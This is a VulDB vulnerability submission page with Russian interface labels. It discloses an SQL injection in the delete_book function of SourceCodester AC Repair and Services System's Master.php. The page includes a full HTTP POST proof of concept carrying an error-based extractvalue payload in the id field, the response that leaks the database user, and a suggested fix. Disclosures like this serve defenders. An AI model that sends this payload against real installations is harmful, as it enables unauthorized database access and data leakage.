Отправить #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.phpИнформация

НазваниеSourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
ОписаниеI find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=delete_book. POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780 Content-Length: 906 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="fullname" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="email" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="contact" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="address" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="services[]" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="status" 1 -----------------------------25039842273186474810708140780-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter.My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
Источник⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Пользователь
 fushuling (UID 45488)
Представление11.07.2023 17:42 (3 лет назад)
Модерация13.07.2023 11:49 (2 days later)
Статуспринято
Запись VulDB234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book ИД SQL-инъекция]
Баллы20

ПредыдущийОбзорДалее

Do you know our Splunk app?

Download it now for free!